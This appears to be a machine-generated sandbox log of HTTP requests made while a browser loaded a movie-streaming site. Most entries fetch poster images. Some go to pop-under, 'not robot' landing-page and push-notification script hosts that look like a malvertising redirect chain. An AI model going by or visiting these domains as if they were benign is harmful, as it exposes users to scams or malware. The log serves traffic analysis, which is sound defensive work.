Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDU2ZWJlMjktMTRhMy00ZTA5LWEzNDgtYmNmZTEwZTViZWJkXkEyXkFqcGdeQXVyNDQ2OTk4MzI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjIxOTIyNjE4OF5BMl5BanBnXkFtZTgwMDc5NTY2MDE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTYxNGMyZTYtMjE3MS00MzNjLWFjNmYtMDk3N2FmM2JiM2M1XkEyXkFqcGdeQXVyNjY5NDU4NzI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMzFkM2YwOTQtYzk2Mi00N2VlLWE3NTItN2YwNDg1YmY0ZDNmXkEyXkFqcGdeQXVyMTMxODk2OTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzQzOTk3OTAtNDQ0Zi00ZTVkLWI0MTEtMDllZjNkYzNjNTc4L2ltYWdlXkEyXkFqcGdeQXVyNjU0OTQ0OTY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTQ2Nzc1MDQzOF5BMl5BanBnXkFtZTgwMDgzMTA5MzE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMWY0NzY0NWMtZDg2NC00NjI3LThhNTAtOWY4Y2ZhY2FiMmY4XkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDM2ZGY5MDQtZTUyMS00ZTgzLTk4YWMtMWM2YjE2NWQ1Yjk3XkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popunder.gif HTTP/1.1Host: bineukdwithme.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dlp?st=1&lp=not_robot_3&geo=US HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTU4Mzk3ODIyOF5BMl5BanBnXkFtZTgwODgyNzk2NjE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNjNhNTgyNGQtM2RkMS00YzRmLWFjMWQtZDA2NDU2ODZkMzExXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNTBmZWJkNjctNDhiNC00MGE2LWEwOTctZTk5OGVhMWMyNmVhXkEyXkFqcGdeQXVyMTMxODk2OTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjEyMzYyZWEtYzM3Ny00YTgxLThmMTQtY2YzM2JkYWQ1YzNjXkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTVjYWJmMWQtYWU4Ni00MWY3LWI2YmMtNTI5MDE0MWVmMmEzL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTU1MzM0MjcxMF5BMl5BanBnXkFtZTgwODQ0MzcxMTE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDU2ZWJlMjktMTRhMy00ZTA5LWEzNDgtYmNmZTEwZTViZWJkXkEyXkFqcGdeQXVyNDQ2OTk4MzI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTYxNGMyZTYtMjE3MS00MzNjLWFjNmYtMDk3N2FmM2JiM2M1XkEyXkFqcGdeQXVyNjY5NDU4NzI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDIzODcyY2EtMmY2MC00ZWVlLTgwMzAtMjQwOWUyNmJjNTYyXkEyXkFqcGdeQXVyNDk3NzU2MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNWE4OTNiM2ItMjY4Ni00ZTViLWFiZmEtZGEyNGY2ZmNlMzIyXkEyXkFqcGdeQXVyMDU5NDcxNw@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMzFkM2YwOTQtYzk2Mi00N2VlLWE3NTItN2YwNDg1YmY0ZDNmXkEyXkFqcGdeQXVyMTMxODk2OTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzQzOTk3OTAtNDQ0Zi00ZTVkLWI0MTEtMDllZjNkYzNjNTc4L2ltYWdlXkEyXkFqcGdeQXVyNjU0OTQ0OTY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNWIwODRlZTUtY2U3ZS00Yzg1LWJhNzYtMmZiYmEyNmU1NjMzXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTU4Mzk3ODIyOF5BMl5BanBnXkFtZTgwODgyNzk2NjE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /push-wrap.js?b=8 HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /block.js?b=4 HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dlp?st=1&lp=not_robot_3&geo=US HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNmVmYzcwNzMtMWM1NS00MWIyLThlMDEtYzUwZDgzODE1NmE2XkEyXkFqcGdeQXVyNzkwMjQ5NzM@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNTBmZWJkNjctNDhiNC00MGE2LWEwOTctZTk5OGVhMWMyNmVhXkEyXkFqcGdeQXVyMTMxODk2OTU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDI0MWQyMzMtOGI4Ni00NTZlLTg0NTItNzQ5Y2UwYjdiOWZmXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjI3MDRhNmEtMWMwNi00MjMxLWIzNzktOGE0NGY0ZTZkNzA4XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTVjYWJmMWQtYWU4Ni00MWY3LWI2YmMtNTI5MDE0MWVmMmEzL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTU1MzM0MjcxMF5BMl5BanBnXkFtZTgwODQ0MzcxMTE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDA2Y2EyNjMtNmJmOS00NjU2LWIxNTQtMzNiYmY1ZDZlZDY5XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOWFmMWM3YWQtM2M2NC00ZmRkLTg4MTEtNjRiNDQ2NDk2MWJkXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNWE4OTNiM2ItMjY4Ni00ZTViLWFiZmEtZGEyNGY2ZmNlMzIyXkEyXkFqcGdeQXVyMDU5NDcxNw@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDIzODcyY2EtMmY2MC00ZWVlLTgwMzAtMjQwOWUyNmJjNTYyXkEyXkFqcGdeQXVyNDk3NzU2MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOGY0YTQ3M2UtZjA5MS00NDg3LTgwYzktM2FhNjhlYTRmNGZiXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNWIwODRlZTUtY2U3ZS00Yzg1LWJhNzYtMmZiYmEyNmU1NjMzXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
